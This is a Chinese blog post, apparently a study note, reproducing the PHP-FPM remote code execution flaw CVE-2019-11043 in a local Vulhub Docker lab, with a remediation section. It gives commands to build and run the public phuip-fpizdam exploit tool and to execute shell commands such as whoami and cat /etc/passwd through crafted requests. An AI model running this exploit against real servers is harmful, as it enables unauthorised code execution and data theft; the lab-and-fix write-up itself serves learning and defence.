在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
(本文仅为平时学习记录,若有错误请大佬指出,如果本文能帮到你那我也是很开心啦)
该复现参考网络中的文章,该漏洞复现仅仅是为了学习交流,严禁非法使用!!!
一、介绍
1 location ~ [^/]\.php(/|$) { 2 ... 3 fastcgi_split_path_info ^(.+?\.php)(/.*)$; 4 fastcgi_param PATH_INFO $fastcgi_path_info; 5 fastcgi_pass php:9000; 6 ... 7 }
(介绍源于http://blog.leanote.com/post/snowming/9da184ef24bd十分详细,感谢!!!)
二、漏洞复现过程 1.环境准备
git clone https://github.com/neex/phuip-fpizdam
go 查看环境中是否有go环境,有的话会返回帮助信息 apt install golang-go 安装go go version 查看go版本
go get -u github.com/neex/phuip-fpizdam
2.启动Docker,进入Vulhub下的php目录下的CVE-2019-11043中,启动整个环境 /etc/init.d/docker start cd vulhub-master/
cd php
cd CVE-2019-11043
docker-compose up -d 3.查看端口 docker ps 列出所有在运行的容器信息 4.根据回显,在宿主机的浏览器上访问使用Vulhub搭建好的所存有漏洞的站点 5.回到Kali,启动工具phuip-fpizdam 1 cd go/bin 2 ./phuip-fpizdam 6.检验漏洞是否存在 ./phuip-fpizdam http://127.0.0.1:8080/index.php
7.漏洞利用,也可将whoami换成其他命令,如:ls、cat /etc/passwd等等,这里不做过多演示
curl "http://127.0.0.1:8080/index.php?a=whoami"
三、修复 1.查看运行的Docker docker ps 2.进入容器内部,并在Nginx配置文件下查找fastcgi_split_path_info 1 docker exec -it b92dfa82075b /bin/bash 2 grep -Rin --color 'fastcgi_split_path_info' /etc/nginx/ 3.读取Nginx的配置文件,找到fastcgi_split_path_info(用作URL匹配)和fastcgi_param PATH_INFO,将其注释即可完成修复 1 cat /etc/nginx/conf.d/default.conf 2 或 3 curl "http://127.0.0.1:8080/index.php?=cat /etc/nginx/conf.d/default.conf" 利用漏洞
|
2022-07-30
2022-08-17
2022-11-06
2022-08-15
2022-08-18
请发表评论